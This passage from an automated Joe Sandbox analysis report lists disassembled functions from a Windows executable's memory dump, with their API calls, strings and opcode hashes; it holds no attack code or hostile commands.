Part of subcall function 009FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009FE8D0
Part of subcall function 009FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009FE8E1

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 5ef7dd0cd5cc1480d6e447c3c408a206155c7e8c0c03f1e0295df77b59ed0487
Instruction ID: e97460be173ff3156fb5139af245d334c79c8956596c311dd864d43fa25bccc1
Opcode Fuzzy Hash: 5ef7dd0cd5cc1480d6e447c3c408a206155c7e8c0c03f1e0295df77b59ed0487
Instruction Fuzzy Hash: ABA011C22A822ABC300822A02C02C3B022CC0C0BB0330AC2EFA22880A0A88008800A30

Function 009FE5A2 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 009FE580

Part of subcall function 009FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009FE8D0
Part of subcall function 009FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009FE8E1

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 6be1d51e6a685c105075ad2494487c5f93772ec3fb1dc97a39eb889b4f661cb7
Instruction ID: e97460be173ff3156fb5139af245d334c79c8956596c311dd864d43fa25bccc1
Opcode Fuzzy Hash: 6be1d51e6a685c105075ad2494487c5f93772ec3fb1dc97a39eb889b4f661cb7
Instruction Fuzzy Hash: ABA011C22A822ABC300822A02C02C3B022CC0C0BB0330AC2EFA22880A0A88008800A30

Function 009FE55F Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 009FE51F

Part of subcall function 009FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009FE8D0
Part of subcall function 009FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009FE8E1

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 064b772b7900355887e9d47deee232f5677921c0007f8c9449fc2935631bee42
Instruction ID: eb7b3abd270888e95dd46bb653158382e37ce481aedca8a8b46db2efcc656057
Opcode Fuzzy Hash: 064b772b7900355887e9d47deee232f5677921c0007f8c9449fc2935631bee42
Instruction Fuzzy Hash: 7DA022C2AEE20ABC300832002C03C3F022CC0C2FB0330AC2EFA23C00E2BC880C800A30

Function 009FE555 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 009FE51F

Part of subcall function 009FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009FE8D0
Part of subcall function 009FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009FE8E1

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 219f7de7c52657735126b44a9d46a4f6a59aa3bbe5d93d4aaa624b32442d8ddb
Instruction ID: eb7b3abd270888e95dd46bb653158382e37ce481aedca8a8b46db2efcc656057
Opcode Fuzzy Hash: 219f7de7c52657735126b44a9d46a4f6a59aa3bbe5d93d4aaa624b32442d8ddb
Instruction Fuzzy Hash: 7DA022C2AEE20ABC300832002C03C3F022CC0C2FB0330AC2EFA23C00E2BC880C800A30

Function 009FE541 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 009FE51F

Part of subcall function 009FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009FE8D0
Part of subcall function 009FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009FE8E1

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 467c3f50dd85e7fd8dac0180d65fc6e400873e6041f6186c5d76454b637035be
Instruction ID: eb7b3abd270888e95dd46bb653158382e37ce481aedca8a8b46db2efcc656057
Opcode Fuzzy Hash: 467c3f50dd85e7fd8dac0180d65fc6e400873e6041f6186c5d76454b637035be
Instruction Fuzzy Hash: 7DA022C2AEE20ABC300832002C03C3F022CC0C2FB0330AC2EFA23C00E2BC880C800A30

Function 009FE573 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 009FE580

Part of subcall function 009FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009FE8D0
Part of subcall function 009FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009FE8E1

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: f3195101b2acdeffc82eb402a1c39231df2d2060f6392dcfc67996ce0e7f1ca2
Instruction ID: 9462580ea95472f695188f87793eaf0b6dab5e3ad2ab70f63d9880eefdf209fb
Opcode Fuzzy Hash: f3195101b2acdeffc82eb402a1c39231df2d2060f6392dcfc67996ce0e7f1ca2
Instruction Fuzzy Hash: E5A011C22E82283C300822A02C02C3B0A2CC0C0B32330AA2EFA22880A0A8800A800A30

Function 009FE569 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 009FE51F

Part of subcall function 009FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009FE8D0
Part of subcall function 009FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009FE8E1

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 4e05e5fdb294c3f4804430b4f4c1fc297cba9379136afc8c8072fd7c5b33ed6d
Instruction ID: eb7b3abd270888e95dd46bb653158382e37ce481aedca8a8b46db2efcc656057
Opcode Fuzzy Hash: 4e05e5fdb294c3f4804430b4f4c1fc297cba9379136afc8c8072fd7c5b33ed6d
Instruction Fuzzy Hash: 7DA022C2AEE20ABC300832002C03C3F022CC0C2FB0330AC2EFA23C00E2BC880C800A30

Function 009E9F09 Relevance: 1.5, APIs: 1, Instructions: 7fileCOMMON

Download Yara Rule

APIs

SetEndOfFile.KERNELBASE(?,009E903E,?,?,-00000870,?,-000018B8,00000000,?,-000028B8,?,00000800,-000028B8,?,00000000,?), ref: 009E9F0C

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: File
String ID:
API String ID: 749574446-0
Opcode ID: c8473184f9bd7d4e75b4c6c024ac4ea240cd8100b564fca0a87d0aa23de7462d
Instruction ID: ce8dad94ae622ca313816065cb9dd6501060c328726d8982e65acdecc8531009
Opcode Fuzzy Hash: c8473184f9bd7d4e75b4c6c024ac4ea240cd8100b564fca0a87d0aa23de7462d
Instruction Fuzzy Hash: D1A0223008000E8BCE00AF30CE0808C3B30FB20BC030082E8A00BCF0B2CB23880BCB00

Function 009FAC04 Relevance: 1.5, APIs: 1, Instructions: 5COMMON

Download Yara Rule

APIs

SetCurrentDirectoryW.KERNELBASE(?,009FAE72,C:\Users\user\Desktop,00000000,00A2946A,00000006), ref: 009FAC08

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: CurrentDirectory
String ID:
API String ID: 1611563598-0
Opcode ID: d08a347b1feec16920f33510973b46ffdd00da69c125864a4066ce614ede9dc4
Instruction ID: 5d06b32d696a4a6aa87837ec6cde0c12a7f4a4621c9204ac3cfdea429797017d
Opcode Fuzzy Hash: d08a347b1feec16920f33510973b46ffdd00da69c125864a4066ce614ede9dc4
Instruction Fuzzy Hash: 2DA01231100100978E004F328F0554E76556F51710F00C024600080030C730C820A504

Function 009E9620 Relevance: 1.3, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(000000FF,?,?,009E95D6,?,?,?,?,?,00A12641,000000FF), ref: 009E963B

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 210d11cb78d98016826ac4884f4519acbca9dc2c403ed5cdf4ba737e5e654316
Instruction ID: 65718eabd4990c0c31f8c291fb27eaf596171783c95fabef0ff10da812a62cf8
Opcode Fuzzy Hash: 210d11cb78d98016826ac4884f4519acbca9dc2c403ed5cdf4ba737e5e654316
Instruction Fuzzy Hash: 4BF0E930085B959FDB328B25C44879277EC6B12721F040B1FD0E2429E0D3606D8D8A40

Non-executed Functions

Function 009FC220 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 286timewindowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 009E1316: GetDlgItem.USER32(00000000,00003021), ref: 009E135A
Part of subcall function 009E1316: SetWindowTextW.USER32(00000000,00A135F4), ref: 009E1370

SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 009FC2B1
EndDialog.USER32(?,00000006), ref: 009FC2C4
GetDlgItem.USER32(?,0000006C), ref: 009FC2E0
SetFocus.USER32(00000000), ref: 009FC2E7
SetDlgItemTextW.USER32(?,00000065,?), ref: 009FC321
SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 009FC358
FindFirstFileW.KERNEL32(?,?), ref: 009FC36E
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 009FC38C
FileTimeToSystemTime.KERNEL32(?,?), ref: 009FC39C
GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 009FC3B8
GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 009FC3D4
_swprintf.LIBCMT ref: 009FC404

Part of subcall function 009E4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 009E40A5

SetDlgItemTextW.USER32(?,0000006A,?), ref: 009FC417
FindClose.KERNEL32(00000000), ref: 009FC41E
_swprintf.LIBCMT ref: 009FC477
SetDlgItemTextW.USER32(?,00000068,?), ref: 009FC48A
SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 009FC4A7
FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 009FC4C7
FileTimeToSystemTime.KERNEL32(?,?), ref: 009FC4D7
GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 009FC4F1
GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 009FC509
_swprintf.LIBCMT ref: 009FC535
SetDlgItemTextW.USER32(?,0000006B,?), ref: 009FC548
_swprintf.LIBCMT ref: 009FC59C
SetDlgItemTextW.USER32(?,00000069,?), ref: 009FC5AF

Part of subcall function 009FAF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 009FAF35
Part of subcall function 009FAF0F: GetNumberFormatW.KERNEL32(00000400,00000000,?,00A1E72C,?,?), ref: 009FAF84

Strings

REPLACEFILEDLG, xrefs: 009FC247
%s %s, xrefs: 009FC469, 009FC58E
%s %s %s, xrefs: 009FC3F2, 009FC527

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
String ID: %s %s$%s %s %s$REPLACEFILEDLG
API String ID: 797121971-1840816070
Opcode ID: e69468ab73d1b33c4c02dba967566de6f879a4adcb68fae19c43ecea0dc0bfff
Instruction ID: d0138ec55ef80ed9e20912053d6430d60e86a124b8ed2f957fd124202dabcedb
Opcode Fuzzy Hash: e69468ab73d1b33c4c02dba967566de6f879a4adcb68fae19c43ecea0dc0bfff
Instruction Fuzzy Hash: 219182B254834CBBD621DBE4CD49FFB77ACEB8AB00F008919B749D6081D775EA058762

Function 009E6FAA Relevance: 28.3, APIs: 12, Strings: 4, Instructions: 328fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 009E6FAA
_wcslen.LIBCMT ref: 009E7013
_wcslen.LIBCMT ref: 009E7084

Part of subcall function 009E7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 009E7AAB
Part of subcall function 009E7A9C: GetLastError.KERNEL32 ref: 009E7AF1
Part of subcall function 009E7A9C: CloseHandle.KERNEL32(?), ref: 009E7B00

Part of subcall function 009EA1E0: DeleteFileW.KERNELBASE(000000FF,?,?,009E977F,?,?,009E95CF,?,?,?,?,?,00A12641,000000FF), ref: 009EA1F1
Part of subcall function 009EA1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,009E977F,?,?,009E95CF,?,?,?,?,?,00A12641), ref: 009EA21F

CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 009E7139
CloseHandle.KERNEL32(00000000), ref: 009E7155
CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 009E7298

Part of subcall function 009E9DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,009E73BC,?,?,?,00000000), ref: 009E9DBC
Part of subcall function 009E9DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 009E9E70

Part of subcall function 009E9620: CloseHandle.KERNELBASE(000000FF,?,?,009E95D6,?,?,?,?,?,00A12641,000000FF), ref: 009E963B

Part of subcall function 009EA4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,009EA325,?,?,?,009EA175,?,00000001,00000000,?,?), ref: 009EA501
Part of subcall function 009EA4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,009EA325,?,?,?,009EA175,?,00000001,00000000,?,?), ref: 009EA532

Strings

\??\, xrefs: 009E702B
SeRestorePrivilege, xrefs: 009E6FC2
SeCreateSymbolicLinkPrivilege, xrefs: 009E6FCC
UNC\, xrefs: 009E7051

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: File$CloseHandle$AttributesCreateDelete_wcslen$BuffersCurrentErrorFlushH_prologLastProcessTime
String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
API String ID: 3983180755-3508440684
Opcode ID: f40605aa1155dab660da81e1118d50b69114487b02e4df73df9a60182a3edfff
Instruction ID: c4b592beba1961a04dbeae0e8154285773f7a5840dc1563ed04165501cc514d4
Opcode Fuzzy Hash: f40605aa1155dab660da81e1118d50b69114487b02e4df73df9a60182a3edfff
Instruction Fuzzy Hash: 94C1EA71904684AADB22DFB5DD41FEEF7ACAF48300F004559FA56E7182D734AE44CB62

Function 00A0D8EE Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 00A0DA34

Strings

1#SNAN, xrefs: 00A0EC33
1#INF, xrefs: 00A0EC41
1#QNAN, xrefs: 00A0EC3A
1#IND, xrefs: 00A0EC2C

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 4f103bc72e555f7188a6c3c42072924c4614be6431a9ebd6efcc54a6a582514d
Instruction ID: f0acaf87072b6708b7ca461583ea0acd08ab541501989fb515e2d7cfe36350e1
Opcode Fuzzy Hash: 4f103bc72e555f7188a6c3c42072924c4614be6431a9ebd6efcc54a6a582514d
Instruction Fuzzy Hash: 20C23872E0862C8FDB25CF68AD407EAB7B5EB84305F1445EAD44DE7280E775AE819F40

Function 009E32F7 Relevance: 9.4, APIs: 2, Strings: 3, Instructions: 608COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 009E3300
_swprintf.LIBCMT ref: 009E36C7

Strings

CMT, xrefs: 009E3A17
hc%u, xrefs: 009E370A
h%u, xrefs: 009E36BC

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: H_prolog_swprintf
String ID: CMT$h%u$hc%u
API String ID: 146138363-3282847064
Opcode ID: 5526f1ef8a93460ca2695950077de99b771651937923cb1fed1f4cdac88a38b3
Instruction ID: d4ab2cbf9566716d105ca3e5d46ff985a3877fcdb34f589034905d34ca119cfe
Opcode Fuzzy Hash: 5526f1ef8a93460ca2695950077de99b771651937923cb1fed1f4cdac88a38b3
Instruction Fuzzy Hash: D132C3715102C4ABDF16DF75C899BE93BA9AF54300F08447DFD8A8B282DB749E49CB20

Function 009E286B Relevance: 7.8, APIs: 3, Strings: 1, Instructions: 798COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 009E2874
_strlen.LIBCMT ref: 009E2E3F

Part of subcall function 009F02BA: __EH_prolog.LIBCMT ref: 009F02BF

Part of subcall function 009F1B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,009EBAE9,00000000,?,?,?,00010406), ref: 009F1BA0

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009E2F91

Strings

CMT, xrefs: 009E2FBC

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: H_prolog$ByteCharMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
String ID: CMT
API String ID: 1206968400-2756464174
Opcode ID: ec267ef5fbdaa3f9e1d1a83b48992d94225609b3d47fb319548853c23fddb68d
